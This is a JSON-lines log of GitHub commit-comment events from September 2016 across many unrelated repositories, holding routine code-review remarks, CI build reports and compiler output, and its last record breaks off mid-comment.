{"id":"4597425201","type":"CommitCommentEvent","actor":{"login":"l2fprod"},"repo":{"name":"IBM-Bluemix/logistics-wizard-webui"},"payload":{"comment":{"id":19116680,"position":4,"line":6,"path":"README.md","commit_id":"948d2e3fb2159d56e803b326c2ac0649f50f348e","created_at":"2016-09-21T16:33:34Z","updated_at":"2016-09-21T16:33:34Z","body":"You will notice I've updated the build and coveralls badge. I did it across all three projects. Please ensure this new badge is consistent across all the Logistics Wizard projects. Although, what is the use of this icon? We already advertise Zenhub in the Wiki."}},"created_at":"2016-09-21T16:33:34Z"}
{"id":"4597425739","type":"CommitCommentEvent","actor":{"login":"bumbadadabum"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19116681,"position":25,"line":3309,"path":"commands.js","commit_id":"ce9cdecafdcb4e298214e1940e2bacf03bd1ed3a","created_at":"2016-09-21T16:33:39Z","updated_at":"2016-09-21T16:33:39Z","body":"Yeah but they're equivalent. Just curious is all.\n"}},"created_at":"2016-09-21T16:33:39Z"}
{"id":"4597426426","type":"CommitCommentEvent","actor":{"login":"TheSSJ"},"repo":{"name":"TheSSJ/zf2_mmkernel"},"payload":{"comment":{"id":19116682,"position":null,"line":null,"path":null,"commit_id":"6953894b56545315640416725168c518a80d2751","created_at":"2016-09-21T16:33:46Z","updated_at":"2016-09-21T16:33:46Z","body":"Will fix it a little different, no worries :-) but thx as always for your offer "}},"created_at":"2016-09-21T16:33:46Z"}
{"id":"4597426611","type":"CommitCommentEvent","actor":{"login":"lazd"},"repo":{"name":"karma-runner/karma-html2js-preprocessor"},"payload":{"comment":{"id":19116683,"position":null,"line":null,"path":null,"commit_id":"c89b01cdaab19243c79c6196990ed5d33ac058e2","created_at":"2016-09-21T16:33:49Z","updated_at":"2016-09-21T16:33:49Z","body":"@dignifiedquire excellent, thanks!"}},"created_at":"2016-09-21T16:33:49Z"}
{"id":"4597438475","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19116710,"position":null,"line":null,"path":null,"commit_id":"0390610afee8bffae581edb01a35e122c9f1b271","created_at":"2016-09-21T16:35:53Z","updated_at":"2016-09-21T16:35:53Z","body":"Wouldn't the simply dropping the else have been easier ?\r\n\r\n```diff\r\n  #if defined(HAVE_MPI) && !defined(_JOHN_MISC_NO_LOG)\r\n  \tif (mpi_p > 1)\r\n  \t\tfprintf(stderr, \"%u@%s: \", mpi_id + 1, mpi_name);\r\n  #endif\r\n-  \telse\r\n #elif OS_FORK && !defined(_JOHN_MISC_NO_LOG)\r\n  \tif (options.fork)\r\n  \t\tfprintf(stderr, \"%u: \", options.node_min);\r\n  #endif\r\n```"}},"created_at":"2016-09-21T16:35:53Z"}
{"id":"4597438924","type":"CommitCommentEvent","actor":{"login":"harishpro"},"repo":{"name":"Akash-Sinha/AndroidTraining-2016-17"},"payload":{"comment":{"id":19116711,"position":null,"line":null,"path":null,"commit_id":"7bbaf367351737cbf498b8d630643a2408c564ec","created_at":"2016-09-21T16:35:58Z","updated_at":"2016-09-21T16:35:58Z","body":"![java1](https://cloud.githubusercontent.com/assets/12773167/18720031/8ef06f2a-8047-11e6-89c5-0353ed01960e.jpg)\r\n"}},"created_at":"2016-09-21T16:35:58Z"}
{"id":"4597443126","type":"CommitCommentEvent","actor":{"login":"dbrgn"},"repo":{"name":"saltyrtc/saltyrtc-meta"},"payload":{"comment":{"id":19116729,"position":null,"line":null,"path":null,"commit_id":"8ece624dfa81aa87847e0ee9ebcac331bcd5a9d5","created_at":"2016-09-21T16:36:42Z","updated_at":"2016-09-21T16:36:42Z","body":"> the client SHALL treat this incident as a protocol error.\r\n\r\nI don't quite agree. What if this case happens?\r\n\r\n- ICE candidate is sent via Websocket\r\n- Handover\r\n- 11 data messages are sent via Data Channel\r\n- Websocket was already closed, we get a `send-error` message for the ICE candidate\r\n- Protocol error, the entire connection dies\r\n\r\nWhat about logging it as a warning? Or do we need to guarantee the delivery of all messages?"}},"created_at":"2016-09-21T16:36:42Z"}
{"id":"4597444265","type":"CommitCommentEvent","actor":{"login":"Zegorax"},"repo":{"name":"brusselopole/Worldopole"},"payload":{"comment":{"id":19116731,"position":null,"line":null,"path":null,"commit_id":"2cdf31a1ede27dad6b55083d4ba0a52935acc591","created_at":"2016-09-21T16:36:55Z","updated_at":"2016-09-21T16:36:55Z","body":"Wouuups, copy-pasted too quickly ahah"}},"created_at":"2016-09-21T16:36:55Z"}
{"id":"4597444533","type":"CommitCommentEvent","actor":{"login":"Yakovlev-Melarn"},"repo":{"name":"Voldemaras/phpprobidmods"},"payload":{"comment":{"id":19116733,"position":null,"line":null,"path":null,"commit_id":"b34acd4eab79a24aa441d1888880108dc2832a23","created_at":"2016-09-21T16:36:57Z","updated_at":"2016-09-21T16:36:57Z","body":"wow xD"}},"created_at":"2016-09-21T16:36:57Z"}
{"id":"4597446260","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19116737,"position":null,"line":null,"path":null,"commit_id":"ec522547e5f91792a13fe9aaf678f3e1b5ca42bc","created_at":"2016-09-21T16:37:14Z","updated_at":"2016-09-21T16:37:14Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - Win64-Windows-7-VisualStudio-12: Build Failed\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec522547e5f91792a13fe9aaf678f3e1b5ca42bc-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec522547e5f91792a13fe9aaf678f3e1b5ca42bc-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-51.18%25-red.svg)</a> \n"}},"created_at":"2016-09-21T16:37:14Z"}
{"id":"4597446600","type":"CommitCommentEvent","actor":{"login":"Re3os"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19116741,"position":null,"line":null,"path":null,"commit_id":"2730576823c6733a6201426019ddca3f7dbba081","created_at":"2016-09-21T16:37:18Z","updated_at":"2016-09-21T16:37:18Z","body":"Error: unable to create file sql/updates/world/3.3.5/ \t2016_09_21_03_world.sql (Invalid argument)"}},"created_at":"2016-09-21T16:37:18Z"}
{"id":"4597451398","type":"CommitCommentEvent","actor":{"login":"Voldemaras"},"repo":{"name":"Voldemaras/phpprobidmods"},"payload":{"comment":{"id":19116748,"position":null,"line":null,"path":null,"commit_id":"b34acd4eab79a24aa441d1888880108dc2832a23","created_at":"2016-09-21T16:38:10Z","updated_at":"2016-09-21T16:38:10Z","body":"?? \n\nSent from my iPhone\n\n> On 21 Sep 2016, at 19:36, Alexey <notifications@github.com> wrote:\n> \n> wow xD\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-21T16:38:10Z"}
{"id":"4597456277","type":"CommitCommentEvent","actor":{"login":"colbycheeze"},"repo":{"name":"IBM-Bluemix/logistics-wizard-webui"},"payload":{"comment":{"id":19116758,"position":4,"line":6,"path":"README.md","commit_id":"948d2e3fb2159d56e803b326c2ac0649f50f348e","created_at":"2016-09-21T16:39:01Z","updated_at":"2016-09-21T16:39:01Z","body":"Sure we can just copy this line to the other repos.\r\nit's mostly for anyone coming to the repo who doesn't already know about or have zenhub installed, so that they can get the plugin and see our board."}},"created_at":"2016-09-21T16:39:01Z"}
{"id":"4597457496","type":"CommitCommentEvent","actor":{"login":"taion"},"repo":{"name":"facebook/relay"},"payload":{"comment":{"id":19116764,"position":null,"line":null,"path":null,"commit_id":"ba05332044ab8e68890f63a875514211ee480908","created_at":"2016-09-21T16:39:14Z","updated_at":"2016-09-21T16:39:14Z","body":"What's the reasoning behind this change? IMO it's a bit dirty to use `clientMutationId` (rather than `clientSubscriptionId`) to identify subscriptions.\r\n\r\nAmong other things, this is extremely difficult for userspace implementations to make use of in a reasonable way – the generation of sequential `clientMutationId`s is not something that a third-party subscription implementation can reach into and make use of.\r\n\r\nWouldn't it be best to instead move forward with https://github.com/facebook/relay/pull/736 to drop the remaining dependency on `clientMutationId` in subscription handling instead?"}},"created_at":"2016-09-21T16:39:14Z"}
{"id":"4597458325","type":"CommitCommentEvent","actor":{"login":"fheck"},"repo":{"name":"vulder/INAW"},"payload":{"comment":{"id":19116771,"position":19,"line":19,"path":"code/modules/Lemmatizer.py","commit_id":"cbb1b09ae30c726c60a7fc9de36f465a59a90bdb","created_at":"2016-09-21T16:39:22Z","updated_at":"2016-09-21T16:39:22Z","body":"Sounds about right. \r\n\r\nThe functions is along the idea at the end of [this article](https://datascience.blog.wzb.eu/2016/07/13/accurate-part-of-speech-tagging-of-german-texts-with-nltk/) but instead of the Hunspell stemmer (which, according to the article, actually does not do stemming but a kind of lemmatization) I used the available stemmer from NLTK. \r\n\r\nThis is not an ideal solution, and one might want to add the Hunspell spellchecker anyway, but the main reason this does not perform very good for now, is the limited trainings set in the TIGER corpus."}},"created_at":"2016-09-21T16:39:22Z"}
{"id":"4597459572","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19116778,"position":null,"line":null,"path":null,"commit_id":"e9c8478e48d40b3816ddf92b3d0604013ab04d06","created_at":"2016-09-21T16:39:35Z","updated_at":"2016-09-21T16:39:35Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1091](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13823&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 2 (2 new), passed: 224, ignored: 3 Build time: 00:08:57\n### Failed tests\n```\norg.genivi.sota.device_registry.DeviceResourceSpec.PUT request with same deviceName fails with conflict.: <no details avaliable>\n\norg.genivi.sota.device_registry.DeviceResourceSpec.PUT request with same deviceId fails with conflict.: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-21T16:39:35Z"}
{"id":"4597463148","type":"CommitCommentEvent","actor":{"login":"Yakovlev-Melarn"},"repo":{"name":"Voldemaras/phpprobidmods"},"payload":{"comment":{"id":19116786,"position":null,"line":null,"path":null,"commit_id":"b34acd4eab79a24aa441d1888880108dc2832a23","created_at":"2016-09-21T16:40:14Z","updated_at":"2016-09-21T16:40:14Z","body":"it is a pity that an empty repository"}},"created_at":"2016-09-21T16:40:14Z"}
{"id":"4597463365","type":"CommitCommentEvent","actor":{"login":"adixon"},"repo":{"name":"civicrm/civicrm-core"},"payload":{"comment":{"id":19116787,"position":null,"line":null,"path":null,"commit_id":"f61437d3e85c5458b06403a5118ab9f04ac7a1dc","created_at":"2016-09-21T16:40:16Z","updated_at":"2016-09-21T16:40:16Z","body":"This fails for a contribution page with multiple payment processors where there is no site default (presumably due to an earlier issue)."}},"created_at":"2016-09-21T16:40:16Z"}
{"id":"4597467294","type":"CommitCommentEvent","actor":{"login":"lgrahl"},"repo":{"name":"saltyrtc/saltyrtc-meta"},"payload":{"comment":{"id":19116796,"position":null,"line":null,"path":null,"commit_id":"312878823300d84e5279dc9a46e16c58c12c77d8","created_at":"2016-09-21T16:40:57Z","updated_at":"2016-09-21T16:40:57Z","body":"Mhh. What if the path gets completely blocked by some broken implementation or a DoS attack?"}},"created_at":"2016-09-21T16:40:57Z"}
{"id":"4597471825","type":"CommitCommentEvent","actor":{"login":"keilaloia"},"repo":{"name":"keilaloia/pong"},"payload":{"comment":{"id":19116807,"position":null,"line":null,"path":null,"commit_id":"e480b4a5b5bacc9ce96b8230297ec0d5af93bf2a","created_at":"2016-09-21T16:41:45Z","updated_at":"2016-09-21T16:41:45Z","body":"All rights reserved, Free for public use"}},"created_at":"2016-09-21T16:41:45Z"}
{"id":"4597476619","type":"CommitCommentEvent","actor":{"login":"dbrgn"},"repo":{"name":"saltyrtc/saltyrtc-meta"},"payload":{"comment":{"id":19116813,"position":null,"line":null,"path":null,"commit_id":"312878823300d84e5279dc9a46e16c58c12c77d8","created_at":"2016-09-21T16:42:36Z","updated_at":"2016-09-21T16:42:36Z","body":"Then the 60 seconds probably won't help us either. The implementation can add countermeasures to drop connections in such a case. Or regular network based DDOS protection devices can be used."}},"created_at":"2016-09-21T16:42:36Z"}
{"id":"4597479237","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19116820,"position":7,"line":39,"path":"src/SkirtBrim.cpp","commit_id":"0b4eda9592d2025b8461524eb4562013160eb82b","created_at":"2016-09-21T16:43:03Z","updated_at":"2016-09-21T16:43:03Z","body":"Depends on what they are used for. This code is for simplifying the\npolygons so that offsets will be easier to compute.\n\nYou could argue these should depend on the nozzle size, but then the\nfraction of the nozzle size is still a magic number.\n\nThese values have been tweaked for fast slicing while retaining accurate\nbrims.\n\nDo you think these should depend the nozzle size?\n\nOp 21 sep. 2016 15:44 schreef \"Aldo Hoeben\" <notifications@github.com>:\n\n> As someone diving fresh into CuraEngine code, do we need to worry about\n> these \"magic numbers\"?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Ultimaker/CuraEngine/commit/0b4eda9592d2025b8461524eb4562013160eb82b#commitcomment-19113845>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIe9EcEJxqfYKSkPpdw5OGzMRJALGUExks5qsTSUgaJpZM4KC0Og>\n> .\n>\n"}},"created_at":"2016-09-21T16:43:03Z"}
{"id":"4597480816","type":"CommitCommentEvent","actor":{"login":"ngraymon"},"repo":{"name":"ckwatson/kernel"},"payload":{"comment":{"id":19116824,"position":null,"line":null,"path":null,"commit_id":"de1bff0a73a9c3e7d9599f1ec00eff7fd7bb3d1d","created_at":"2016-09-21T16:43:20Z","updated_at":"2016-09-21T16:43:20Z","body":"Ah, I think I just noticed a silly error, \r\n`true_data = np.append(true_data, np.repeat(true_data[:,-1].reshape((6,1)), length_difference, axis=1), axis=1)`\r\nWhere I wrote 6, that is the number of chemical species that I had in my test case.\r\nIt should probably be `true_data.shape[0]`"}},"created_at":"2016-09-21T16:43:20Z"}
{"id":"4597485146","type":"CommitCommentEvent","actor":{"login":"JYG0723"},"repo":{"name":"JYG0723/learngit-1"},"payload":{"comment":{"id":19116830,"position":null,"line":null,"path":null,"commit_id":"de04a1f1fc5b849f9b60a4f987f2c92667bcfb2d","created_at":"2016-09-21T16:44:05Z","updated_at":"2016-09-21T16:44:05Z","body":"You"}},"created_at":"2016-09-21T16:44:05Z"}
{"id":"4597487208","type":"CommitCommentEvent","actor":{"login":"MSommars"},"repo":{"name":"MSommars/planets"},"payload":{"comment":{"id":19116833,"position":null,"line":null,"path":null,"commit_id":"ca28e53c2b1634bba6a0e0c36b2ade5272d661d7","created_at":"2016-09-21T16:44:26Z","updated_at":"2016-09-21T16:44:26Z","body":"Stop messing with my text files!"}},"created_at":"2016-09-21T16:44:26Z"}
{"id":"4597492303","type":"CommitCommentEvent","actor":{"login":"BeOleg"},"repo":{"name":"CounterpartyXCP/counterparty-lib"},"payload":{"comment":{"id":19116839,"position":5,"line":240,"path":"counterpartylib/lib/log.py","commit_id":"96e7dffa7c429f4acc74dee723a0d76820fb1c42","created_at":"2016-09-21T16:45:19Z","updated_at":"2016-09-21T16:45:19Z","body":"Have you guys hears of pep8? 💃 "}},"created_at":"2016-09-21T16:45:19Z"}
{"id":"4597498669","type":"CommitCommentEvent","actor":{"login":"lemonzi"},"repo":{"name":"ibab/tensorflow-wavenet"},"payload":{"comment":{"id":19116848,"position":13,"line":71,"path":"generate.py","commit_id":"e25e6d5226edc906200ddbb3ad8f6b9d7f0b7898","created_at":"2016-09-21T16:46:19Z","updated_at":"2016-09-21T16:46:19Z","body":"This will obfuscate the name.  `decoded_samples`?"}},"created_at":"2016-09-21T16:46:19Z"}
{"id":"4597502017","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19116859,"position":null,"line":null,"path":null,"commit_id":"b6ef682d7725e9fe38db38cf34317198ad4f17e1","created_at":"2016-09-21T16:46:54Z","updated_at":"2016-09-21T16:46:54Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (mjwitte) - x86_64-MacOS-10.9-clang: OK (2334 of 2334 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b6ef682d7725e9fe38db38cf34317198ad4f17e1-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b6ef682d7725e9fe38db38cf34317198ad4f17e1-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-21T16:46:54Z"}
{"id":"4597512508","type":"CommitCommentEvent","actor":{"login":"BertHav"},"repo":{"name":"openwrt-vgv7519/uboot-bin"},"payload":{"comment":{"id":19116879,"position":null,"line":null,"path":null,"commit_id":"76fdd8e638f81e324ffe77856481bd147398f6e8","created_at":"2016-09-21T16:48:45Z","updated_at":"2016-09-21T16:48:45Z","body":"I have reverted to the original fw. It reports hardware version R02."}},"created_at":"2016-09-21T16:48:45Z"}
{"id":"4597515210","type":"CommitCommentEvent","actor":{"login":"ruslo"},"repo":{"name":"hunter-packages/rapidjson"},"payload":{"comment":{"id":19116884,"position":null,"line":null,"path":null,"commit_id":"47cb70e878d884a7ef6c9e7c5ad00642ab5aae42","created_at":"2016-09-21T16:49:15Z","updated_at":"2016-09-21T16:49:15Z","body":"> why you change the version definition\r\n\r\nBecause\r\n* len(`VERSION 1.0.2`)=13 \r\n* len(`set(LIB_MAJOR_VERSION \"1\")...ION}.${LIB_PATCH_VERSION}\")`=169\r\n\r\nAlso standard variables describing project version can be used by [write_basic_package_version_file](https://cmake.org/cmake/help/latest/module/CMakePackageConfigHelpers.html), if you use nonstandard `LIB_*_VERSION` you have to set them manually. As a rule of thumb always use standard CMake stuff.\r\n\r\n>  cmake-config files for the use in hunter\r\n\r\nPrevious version is simply broken. If config will be written with `INCLUDE_INSTALL_DIR` it became unrelocatable since `INCLUDE_INSTALL_DIR` is a full path. Again, there are standard way to create config automatically - use it. Also I don't think it will work with DESTDIR and CPack, the presence of CMAKE_INSTALL_PREFIX in CMakeLists.txt usually is an indicator of badly designed code. See details: http://cgold.readthedocs.io/en/latest/tutorials/install/install-prefix.html#summary"}},"created_at":"2016-09-21T16:49:15Z"}
{"id":"4597516439","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19116891,"position":null,"line":null,"path":null,"commit_id":"08a206f3eb2713a17eda636ebb96ed8142a4036d","created_at":"2016-09-21T16:49:29Z","updated_at":"2016-09-21T16:49:29Z","body":"Without the rewrite on Ubuntu 12 and Clang 3.4:\r\n\r\n```\r\nclang++ -DNDEBUG -g2 -O2 -march=native -pipe -c blake2.cpp\r\nIn file included from blake2.cpp:11:\r\nIn file included from ./blake2.h:23:\r\n./seckey.h:218:17: warning: comparison of unsigned expression < 0 is always\r\n      false [-Wtautological-compare]\r\n                if (keylength < (size_t)MIN_KEYLENGTH)\r\n                    ~~~~~~~~~ ^ ~~~~~~~~~~~~~~~~~~~~~\r\n./seckey.h:304:65: note: in instantiation of member function\r\n      'CryptoPP::VariableKeyLength<64, 0, 64, 1, 4, 0>::StaticGetValidKeyLength'\r\n      requested here\r\n        size_t GetValidKeyLength(size_t keylength) const {return INFO::StaticGet...\r\n                                                                       ^\r\n./blake2.h:259:71: note: in instantiation of member function\r\n      'CryptoPP::SimpleKeyingInterfaceImpl<CryptoPP::MessageAuthenticationCode,\r\n      CryptoPP::BLAKE2_Info<true> >::GetValidKeyLength' requested here\r\n  ...treeMode=false, unsigned int digestSize = DIGESTSIZE) : ThisBase(treeMod...\r\n                                                             ^\r\nIn file included from blake2.cpp:11:\r\nIn file included from ./blake2.h:23:\r\n./seckey.h:218:17: warning: comparison of unsigned expression < 0 is always\r\n      false [-Wtautological-compare]\r\n                if (keylength < (size_t)MIN_KEYLENGTH)\r\n                    ~~~~~~~~~ ^ ~~~~~~~~~~~~~~~~~~~~~\r\n./seckey.h:304:65: note: in instantiation of member function\r\n      'CryptoPP::VariableKeyLength<32, 0, 32, 1, 4, 0>::StaticGetValidKeyLength'\r\n      requested here\r\n        size_t GetValidKeyLength(size_t keylength) const {return INFO::StaticGet...\r\n                                                                       ^\r\n./blake2.h:295:71: note: in instantiation of member function\r\n      'CryptoPP::SimpleKeyingInterfaceImpl<CryptoPP::MessageAuthenticationCode,\r\n      CryptoPP::BLAKE2_Info<false> >::GetValidKeyLength' requested here\r\n  ...treeMode=false, unsigned int digestSize = DIGESTSIZE) : ThisBase(treeMod...\r\n                                                             ^\r\n```\r\n"}},"created_at":"2016-09-21T16:49:29Z"}
{"id":"4597517862","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19116892,"position":null,"line":null,"path":null,"commit_id":"9eeea487ecbd7e136ec45a38439737fd20d729a4","created_at":"2016-09-21T16:49:44Z","updated_at":"2016-09-21T16:49:44Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.251.9eeea487ecbd7e136ec45a38439737fd20d729a4](http://build.palaso.org/viewLog.html?buildId=77014&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1496, ignored: 17 Build time: 00:08:11"}},"created_at":"2016-09-21T16:49:44Z"}
{"id":"4597520444","type":"CommitCommentEvent","actor":{"login":"harishpro"},"repo":{"name":"Akash-Sinha/AndroidTraining-2016-17"},"payload":{"comment":{"id":19116896,"position":null,"line":null,"path":null,"commit_id":"7bbaf367351737cbf498b8d630643a2408c564ec","created_at":"2016-09-21T16:50:13Z","updated_at":"2016-09-21T16:50:13Z","body":"program for word-separator \r\n\r\nimport java.util.*;\r\n\r\n\r\n\r\npublic class Main\r\n\r\n{\r\n\r\n\tpublic static void main(String[] args)\r\n\r\n\t{\r\n\r\n\t\tSystem.out.println(\"Hello World!\");\r\n\r\n\t\tScanner sc = new Scanner(System.in);\r\n\r\n\t\t\r\n\r\n\t\tString s ;\r\n\r\n\t\tSystem.out.println(\"enter a name : \");\r\n\r\n\t\tStringBuilder sb = new StringBuilder(sc.nextLine());\r\n\r\n\t\tSystem.out.println(\"enter a saperator : \");\r\n\r\n\t\ts=sc.nextLine();\r\n\r\n\t\twhile(true)\r\n\r\n\t\t{\r\n\r\n\t\t\tif(sb.indexOf(s)!=-1)\r\n\r\n\t\t\t\tsb.delete(sb.indexOf(s) , sb.indexOf(s) + s.length());\r\n\r\n\t\t\telse\r\n\r\n\t\t\t\tbreak;\r\n\r\n\t\t\t\t\r\n\r\n\t\t}\r\n\r\n\t\tSystem.out.println(sb);\r\n\r\n\t\t}\r\n\r\n\t\t\r\n\r\n}"}},"created_at":"2016-09-21T16:50:13Z"}
{"id":"4597522163","type":"CommitCommentEvent","actor":{"login":"FenrirWillow"},"repo":{"name":"elsys/survival-guide"},"payload":{"comment":{"id":19116902,"position":25,"line":25,"path":"11-linux.md","commit_id":"662cbb3d53692e9cb939dbee84d737768ee2cf8d","created_at":"2016-09-21T16:50:31Z","updated_at":"2016-09-21T16:50:31Z","body":"Предполагам Toolchain-а ви е все още същия? GCC, G++, CMake, Make, python, ruby, java? Нещо още специално да ви трябва?"}},"created_at":"2016-09-21T16:50:31Z"}
{"id":"4597522611","type":"CommitCommentEvent","actor":{"login":"CSaratakij"},"repo":{"name":"CSaratakij/Hook"},"payload":{"comment":{"id":19116904,"position":null,"line":null,"path":null,"commit_id":"35ce35315f0ad9482338e0e6d9d9b0516ff62d3c","created_at":"2016-09-21T16:50:35Z","updated_at":"2016-09-21T16:50:35Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;Pn5ulkfv&#x2F;4-issue\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Issue</a>"}},"created_at":"2016-09-21T16:50:35Z"}
{"id":"4597527055","type":"CommitCommentEvent","actor":{"login":"abisz"},"repo":{"name":"fhstp-mfg/mobilot"},"payload":{"comment":{"id":19116917,"position":null,"line":null,"path":null,"commit_id":"d1cecfa132a9a5d8896a2ae34c528b40ea25d111","created_at":"2016-09-21T16:51:22Z","updated_at":"2016-09-21T16:51:22Z","body":"@miclaus what's the problem? \r\nPersonally I think it's not a big deal for our use case. We only need to components written in React not a whole app... "}},"created_at":"2016-09-21T16:51:22Z"}
{"id":"4597528799","type":"CommitCommentEvent","actor":{"login":"kgrgreer"},"repo":{"name":"foam-framework/foam2-experimental"},"payload":{"comment":{"id":19116921,"position":7,"line":77,"path":"src/foam/dao/MDAO.js","commit_id":"81b1a5fd003b9897ee339250d69fdd3e757eaeb6","created_at":"2016-09-21T16:51:43Z","updated_at":"2016-09-21T16:51:43Z","body":"Could just be:\r\nvar ids = this.of$cls.ids || [ 'id' ];"}},"created_at":"2016-09-21T16:51:43Z"}
{"id":"4597529449","type":"CommitCommentEvent","actor":{"login":"kgrgreer"},"repo":{"name":"foam-framework/foam2-experimental"},"payload":{"comment":{"id":19116922,"position":null,"line":null,"path":null,"commit_id":"81b1a5fd003b9897ee339250d69fdd3e757eaeb6","created_at":"2016-09-21T16:51:49Z","updated_at":"2016-09-21T16:51:49Z","body":"LGTM"}},"created_at":"2016-09-21T16:51:49Z"}
{"id":"4597532873","type":"CommitCommentEvent","actor":{"login":"Cnetsra"},"repo":{"name":"Cnetsra/Hello-world"},"payload":{"comment":{"id":19116930,"position":null,"line":null,"path":null,"commit_id":"6fe4a10b9ab4c60e2b75fd71bc32cb07f8215f07","created_at":"2016-09-21T16:52:26Z","updated_at":"2016-09-21T16:52:26Z","body":"ok"}},"created_at":"2016-09-21T16:52:26Z"}
{"id":"4597536480","type":"CommitCommentEvent","actor":{"login":"barbarosh"},"repo":{"name":"SwanCourses/Guz-Vitaliy"},"payload":{"comment":{"id":19116941,"position":5,"line":6,"path":"package.json","commit_id":"1dd3754f513cf02d715ab5b398cd06c5cd169777","created_at":"2016-09-21T16:53:08Z","updated_at":"2016-09-21T16:53:08Z","body":"Адрес не тут нужно менять, этот для тестирования, смотри файл конфига в папке server"}},"created_at":"2016-09-21T16:53:08Z"}
{"id":"4597538331","type":"CommitCommentEvent","actor":{"login":"IAmNotHanni"},"repo":{"name":"inexor-game/code"},"payload":{"comment":{"id":19116944,"position":19,"line":73,"path":"inexor/entity/EntitySystem.hpp","commit_id":"0d36c67b4151fc01a768afc4a868cba596372d10","created_at":"2016-09-21T16:53:28Z","updated_at":"2016-09-21T16:53:28Z","body":"Looks like that is a mistake."}},"created_at":"2016-09-21T16:53:28Z"}
{"id":"4597538501","type":"CommitCommentEvent","actor":{"login":"gillHarjinder"},"repo":{"name":"gillHarjinder/SoftwareEngineering441"},"payload":{"comment":{"id":19116945,"position":635,"line":635,"path":"LICENSE.txt","commit_id":"f5585c898268f951e6cd104484356428cb75827d","created_at":"2016-09-21T16:53:29Z","updated_at":"2016-09-21T16:53:29Z","body":"Harjinder Gill"}},"created_at":"2016-09-21T16:53:29Z"}
{"id":"4597541044","type":"CommitCommentEvent","actor":{"login":"barbarosh"},"repo":{"name":"SwanCourses/Guz-Vitaliy"},"payload":{"comment":{"id":19116953,"position":1,"line":1,"path":"client/modules/Post/components/PostList.css","commit_id":"1dd3754f513cf02d715ab5b398cd06c5cd169777","created_at":"2016-09-21T16:53:58Z","updated_at":"2016-09-21T16:53:58Z","body":"Layout править в файле App.js в задание есть упоминание на счет этого"}},"created_at":"2016-09-21T16:53:58Z"}
{"id":"4597550599","type":"CommitCommentEvent","actor":{"login":"NareshreddyBarrolla"},"repo":{"name":"NareshreddyBarrolla/programs"},"payload":{"comment":{"id":19116966,"position":null,"line":null,"path":null,"commit_id":"e9d824963c9475af106edf414dca2a225c5544ce","created_at":"2016-09-21T16:55:34Z","updated_at":"2016-09-21T16:55:34Z","body":"Heap sort using max heap & heapify"}},"created_at":"2016-09-21T16:55:34Z"}
{"id":"4597558489","type":"CommitCommentEvent","actor":{"login":"erhlee-bird"},"repo":{"name":"trailofbits/remill"},"payload":{"comment":{"id":19116985,"position":null,"line":null,"path":null,"commit_id":"50d64ef5a12eff24aad952f2ebb160e693b87197","created_at":"2016-09-21T16:56:58Z","updated_at":"2016-09-21T16:56:58Z","body":"Yup that did the trick @pgoodman thanks"}},"created_at":"2016-09-21T16:56:58Z"}
{"id":"4597567370","type":"CommitCommentEvent","actor":{"login":"Tee7even"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":19117002,"position":5,"line":126,"path":"api/src/main/java/com/voxelwind/api/server/event/block/BlockReplaceEvent.java","commit_id":"fe8d1cebd2aa3a61216b81524f39d76aea5ac99d","created_at":"2016-09-21T16:58:35Z","updated_at":"2016-09-21T16:58:35Z","body":"> How do I revertPlayerChatEvent?\n\nWhat do you mean by that?\n\nWell, for those rare occasions when event may have more results, you can\nadd this enum individually, otherwise you can make the \"Cancellable\" event\nclass with predefined \"Result\" enum and some utility methods.\n\n21 сент. 2016 г. 18:54 пользователь \"Tux\" <notifications@github.com>\nнаписал:\n\n> Let's say that I applied this generic enumeration everywhere. How do I\n> revert PlayerChatEvent?\n>\n> Perhaps we have events where more than two results are possible. In fact,\n> I was considering adding a third result status but decided against it\n> because of the fact that it was a fairly complex 